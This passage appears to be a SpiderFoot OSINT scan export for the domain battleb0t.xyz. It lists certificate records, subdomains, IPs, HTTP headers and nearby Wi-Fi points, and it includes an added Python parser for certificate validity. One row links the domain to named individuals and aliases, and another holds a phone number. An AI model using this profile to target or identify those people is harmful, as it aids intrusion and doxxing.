38:a5:63:c4:16:26:ed:1f:c8:e7:8b:d6:6e:db:f0:07:dd:4e:
a9:fa:5d:63:f8:da:5c:da:d6:9a:39:ad:eb:e5:21:56:13:72:
a3:9a:36:28
|
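The certificate rows above are `openssl x509 -text` style dumps, and two things in them are easy to misread. The `CT Precertificate Poison` extension on the panel.battleb0t.xyz certificate means this is the precertificate the CA submitted to Certificate Transparency logs, not necessarily what the server ever served, and its Not After date (Mar 18 2023) is before the scan date, so the row documents a hostname that existed, not a live endpoint. The parser below is an added example, not part of SpiderFoot or any tool listed in the table; its inputs are trimmed excerpts of the panel.battleb0t.xyz row and of the oldfluid.battleb0t.xyz row below it (the latter is cut off in the export before its extensions end, so its precert flag reflects the excerpt, not the full certificate), and SCAN_DATE is taken from the row timestamps.

```python
"""Parse the 'openssl x509 -text' style dumps that the CertSpotter and
DNS Resolver certificate rows above carry, and judge each certificate
against the scan date instead of treating 'a certificate exists' as a
live finding."""
import re
from datetime import datetime, timezone

SCAN_DATE = datetime(2023, 5, 12, tzinfo=timezone.utc)   # date of this export

# Trimmed from the panel.battleb0t.xyz row above (modulus and signature omitted).
PANEL_CERT = """Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:10:8b:16:97:4c:80:e7:56:d7:06:74:1e:45:16:d2:cf:08
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 18 13:27:58 2022 GMT
Not After : Mar 18 13:27:57 2023 GMT
Subject: CN=panel.battleb0t.xyz
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
CT Precertificate Poison: critical
NULL
"""

# Trimmed from the oldfluid.battleb0t.xyz row further down; that row is cut
# off in the export, so no extensions beyond the SAN are available here.
OLDFLUID_CERT = """Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:d7:56:4b:39:cd:63:5b:72:07:1e:ba:15:c9:f7:2c:e7:33
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 24 04:50:12 2023 GMT
Not After : Jul 23 04:50:11 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
"""


def _grab(pattern: str, text: str):
    m = re.search(pattern, text, re.M)
    return m.group(1).strip() if m else None


def _asn1_time(s: str) -> datetime:
    # openssl prints 'Mar 18 13:27:57 2023 GMT'; single-digit days are space-padded,
    # which strptime tolerates because whitespace in the format matches runs of spaces.
    return datetime.strptime(s.replace(" GMT", ""), "%b %d %H:%M:%S %Y").replace(tzinfo=timezone.utc)


def parse_cert_text(text: str) -> dict:
    return {
        "serial": _grab(r"Serial Number:\s*([0-9a-f:]+)", text).replace(":", ""),
        "sig_alg": _grab(r"^\s*Signature Algorithm:\s*(\S+)", text),
        "issuer": _grab(r"^\s*Issuer:\s*(.+)$", text),
        "subject_cn": _grab(r"^\s*Subject:.*?CN=([^,/\n]+)", text),
        "not_before": _asn1_time(_grab(r"Not Before:\s*(.+)$", text)),
        "not_after": _asn1_time(_grab(r"Not After\s*:\s*(.+)$", text)),
        "sans": re.findall(r"DNS:([^,\s]+)", text),
        # The poison extension marks a CT *pre*certificate: what the CA logged,
        # not necessarily what the server serves.
        "precert": "CT Precertificate Poison" in text,
    }


def status_at(cert: dict, when: datetime = SCAN_DATE) -> str:
    if when < cert["not_before"]:
        return "not_yet_valid"
    if when > cert["not_after"]:
        return "expired"
    return "valid"


def covers(cert: dict, hostname: str) -> bool:
    """Does any SAN match the host? Exact match, or a single-label wildcard."""
    host = hostname.lower()
    for san in (s.lower() for s in cert["sans"]):
        if san == host:
            return True
        if san.startswith("*.") and host.endswith(san[1:]) and host.count(".") == san.count("."):
            return True
    return False


if __name__ == "__main__":
    for text in (PANEL_CERT, OLDFLUID_CERT):
        c = parse_cert_text(text)
        print(f"{c['subject_cn']:<28} {status_at(c):<14} precert={c['precert']} sans={c['sans']}")
```

A CT-derived hostname whose only evidence is an expired precertificate still belongs in the attack-surface inventory, but as historical, and it should be confirmed with a live TLS connection (and a SAN check via covers) before anything is reported against it.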
| 2023-05-12 02:44:13 | IP Address | No | DNS Resolver | 106 | 0 | 1 | 0 | None | 185.199.110.153 | battleb0t.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Beens Gast (Net ID: 00:01:21:1C:17:B1) | 52.3759, 4.8975 |
| 2023-05-12 03:09:36 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 222.30.196.104.bc.googleusercontent.com | 104.196.30.222 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Spleen (Net ID: 00:05:4E:4F:B8:C2) | 39.0469, -77.4903 |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:d7:56:4b:39:cd:63:5b:72:07:1e:ba:15:c9:f7:2c:e7:33
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 24 04:50:12 2023 GMT
Not After : Jul 23 04:50:11 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:82:cb:77:ee:0a:02:15:cc:55:bf:00:98:6f:a8:
3f:b2:14:d4:9c:d2:64:fd:99:e1:d8:26:89:b8:f1:
dc:22:d0:26:9d:8e:a5:23:7c:46:6d:03:ff:6a:e6:
a2:08:ce:de:84:74:8f:ae:3e:dc:7e:26:40:72:7b:
57:ec:43:06:6a:71:6c:fc:31:f4:5e:75:d1:19:14:
5e:39:a9:c9:25:dc:c7:ab:fb:78:13:e9:b6:dd:4e:
22:f5:46:61:9b:4d:92:18:51:63:9f:47:d1:e0:56:
d2:dd:ee:e2:20:b3:7b:38:70:5e:c4:ce:34:85:6e:
20:54:d9:a0:fd:9c:5b:f3:2b:f0:71:40:e4:40:4b:
1e:0f:24:1b:6d:0c:b5:2f:db:ff:c9:99:df:c5:b7:
e3:7b:82:94:fd:3b:73:58:54:64:ee:2f:77:1b:b4:
c2:f6:38:26:30:8a:32:cc:d3:34:07:56:0c:a8:1d:
b3:55:51:77:90:73:0f:96:7f:80:56:ed:10:db:b0:
4f:75:85:22:ed:37:00:ed:d3:cd:b1:63:f5:f1:51:
be:1d:fc:12:12:48:53:55:50:e7:d9:8d:97:f2:49:
cd:d8:c7:68:76:42:1f:19:5e:47:61:6c:1c:99:ed:
d8:16:c4:32:36:77:d5:1b:79:9e:1e:4e:47:15:7c:
27:6f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
18:EC:9F:C5:4F:26:93:D3:4A:02:0B:79:BA:BB:F3:33:18:F7:3E:35
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Apr 24 05:50:12.941 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:BE:39:54:A0:5F:1F:10:03:FA:09:8D:
D3:C7:7F:B5:EC:4B:30:F5:03:1A:D7:13:A5:C5:6A:89:
4C:4A:74:89:42:02:20:3C:6C:13:51:09:EB:20:0E:F2:
03:2C:A0:FE:54:7F:4D:57:F9:31:F5:F6:A8:0E:A0:F4:
B8:E3:3B:F1:51:CA:99
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Apr 24 05:50:12.949 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:96:8C:23:92:33:C0:50:69:A0:CE:CA:
6D:EC:41:72:0F:3A:22:55:7C:E8:C6:CE:65:0C:82:C6:
DB:89:9C:D5:92:02:20:1D:BC:82:99:B2:08:47:68:A7:
19:FE:0E:66:64:BD:7B:34:35:F5:43:E0:B0:AB:08:2C:
AC:E8:D7:78:E2:75:5B
Signature Algorithm: sha256WithRSAEncryption
75:8f:29:3b:d2:d8:ae:b2:42:be:ce:1d:92:6f:bf:ef:e4:4b:
a2:cc:9b:be:a2:6d:3e:79:03:58:39:62:e5:65:53:10:d9:48:
8b:b1:f6:05:b6:b7:52:53:28:4f:2a:d3:20:18:d0:2e:42:4c:
67:b2:a5:67:d1:32:90:9c:d4:e9:3e:c7:a3:6d:7e:19:cf:59:
bf:8e:eb:b2:ef:a8:35:56:cf:4d:12:32:f0:20:aa:e3:fa:5b:
67:0e:ad:7e:fd:aa:d9:0f:00:58:c4:8a:ff:28:e3:56:39:39:
d5:d5:6e:f4:82:09:ef:eb:ef:8d:10:bb:e4:fd:d3:df:7f:82:
4d:1e:9a:8e:07:b9:a2:ea:90:75:6d:88:35:45:32:5e:ef:d2:
88:82:4a:b0:57:e7:ca:c5:b0:4c:c5:d9:46:e9:84:e0:a2:96:
ca:c7:58:f8:26:23:6c:6a:c5:da:2f:19:ae:92:37:d6:01:ed:
da:39:aa:b3:fd:16:7a:3d:70:fe:30:a6:ba:a8:b4:33:13:8f:
50:9b:26:ec:34:68:cd:89:95:9d:6e:0f:b9:d7:5a:5c:dd:74:
3c:28:62:ab:d4:9a:31:85:d4:70:2a:24:9e:4b:82:ea:21:71:
d0:be:45:d1:a2:3f:85:e3:48:93:ac:6c:fe:38:a0:23:13:14:
9d:51:cb:62
| battleb0t.xyz |
| 2023-05-12 02:44:11 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 1 | 0 | None | github.com | battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 6565 7375 (Net ID: 00:00:C5:D7:5E:38) | 41.8781, -87.6298 |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.46): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Faktopedia (Category: images)
https://faktopedia.pl/user/login | login |
| 2023-05-12 02:57:25 | Internet Name - Unresolved | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | files.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:45:27 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 3 | 0 | None | {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'172.67.168.252', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'172.67.0.0/16', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv4', u'latitude': 43.6547, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5A', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3623, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} | 172.67.168.252 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WLAN (Net ID: 00:01:24:F2:68:C6) | 37.780462,-122.390564 |
| 2023-05-12 02:57:22 | Internet Name | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | nwapi2.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:09:38 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 108.48.229.35.bc.googleusercontent.com | 35.229.48.108 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 3 | 0 | None | Netlify\, Inc | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | +14806242599 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Freigut-Technik (Net ID: 00:01:21:21:C1:63) | 50.1188, 8.6843 |
| 2023-05-12 02:44:27 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Node.js | nwapi.battleb0t.xyz |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ZyXEL (Net ID: 00:02:CF:59:46:94) | 40.2024, 29.0398 |
| 2023-05-12 02:44:31 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nuke.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', 
u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': 
u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', 
u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': 
u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': 
u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
| 2023-05-12 03:32:11 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.6:443 | 188.114.97.0/24 |
| 2023-05-12 02:44:12 | SSL Certificate Host Mismatch | Yes | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | *.github.io, github.io, *.github.com, github.com, www.github.com, *.githubusercontent.com, githubusercontent.com | www.battleb0t.xyz |
| 2023-05-12 02:55:28 | Linked URL - Internal | No | URLScan.io | 0 | 0 | 2 | 0 | None | http://kekw.battleb0t.xyz/ | kekw.battleb0t.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | zoom0083 (Net ID: 00:01:38:69:AF:6C) | 37.7642, -122.3993 |
| 2023-05-12 02:55:28 | Linked URL - Internal | No | URLScan.io | 0 | 0 | 2 | 0 | None | http://kekw.battleb0t.xyz/jar | kekw.battleb0t.xyz |
| 2023-05-12 03:08:47 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.221 | 104.196.30.220 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 0 | 0 | 1 | 0 | None | CN=nwapi.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | United States | keyubu.com |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.205): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:23 | HTTP Headers | No | Web Spider | 10 | 0 | 4 | 0 | None | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6071cb5443bc-EWR", "cross-origin-opener-policy": "same-origin"} | https://www.ayhu.xyz/?__cf_chl_f_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU |
| 2023-05-12 02:54:19 | Linked URL - External | No | Web Spider | 0 | 0 | 3 | 0 | None | https://www.google-analytics.com/analytics.js | https://fluid.battleb0t.xyz/ |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Vivino (Category: video)
https://www.vivino.com/users/login | login |
| 2023-05-12 02:44:03 | Internet Name | No | SpiderFoot UI | 193 | 0 | 0 | 0 | None | battleb0t.xyz | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 03:27:54 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.138:443 | 188.114.96.0/24 |
| 2023-05-12 02:44:30 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | jQuery CDN | pics.battleb0t.xyz |
